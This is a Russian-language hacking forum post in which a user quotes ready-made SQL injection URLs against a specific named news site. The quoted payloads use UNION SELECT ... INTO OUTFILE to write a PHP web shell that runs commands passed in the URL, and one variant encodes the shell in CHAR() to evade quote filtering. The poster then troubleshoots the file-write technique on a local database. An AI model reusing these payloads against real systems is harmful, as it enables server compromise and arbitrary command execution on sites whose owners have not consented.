|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521
Репутация:
272
|
|
Сообщение от Iceangel_
вот по сути запрос заливки шелла в вашем случае...
Код:
http://theplace.ru/news/news.php?id=-18864+union+select+1,2,3,4,5,6,7,'<?php system($_GET[cmd]); ?>',9,10,11,12+from+into+outfile+'/здесь путь.../cmd.php'/*
так будет выглядить запрос для обхода фильтрации
Код:
http://theplace.ru/news/news.php?id=-18864+union+select+1,2,3,4,5,6,7,CHAR(39, 60, 63, 112, 104, 112, 32, 115, 121, 115, 116, 101, 109, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 32, 63, 62, 39),9,10,11,12+from+into+outfile+CHAR(39, 47, 1079, 1076, 1077, 1089, 1100, 32, 1087, 1091, 1090, 1100, 46, 46, 46, 47, 99, 109, 100, 46, 112, 104, 112, 39)/*
P.S существует удобный плагин для таких дел HackBar (Firefox)... нифига не получается! пробую просто на локальном компе, вообще для другой базы. На простейшем примере.
Вот так пишет в файл:
Код:
SELECT description
FROM films
WHERE fid =5 into outfile '123654.txt'
а вот так выдает ошипку:
Код:
SELECT description
FROM films
WHERE fid =5 into outfile char(49,50,51,54,53,52,46,116,120,116)
и так тоже не пашет: (типа имя файла в кавычки взял:
Код:
SELECT description
FROM films
WHERE fid =5 into outfile char(39,49,50,51,54,53,52,46,116,120,116,39)
Выходит, что нельзя писать в файл если кавычечги фильтруются?
|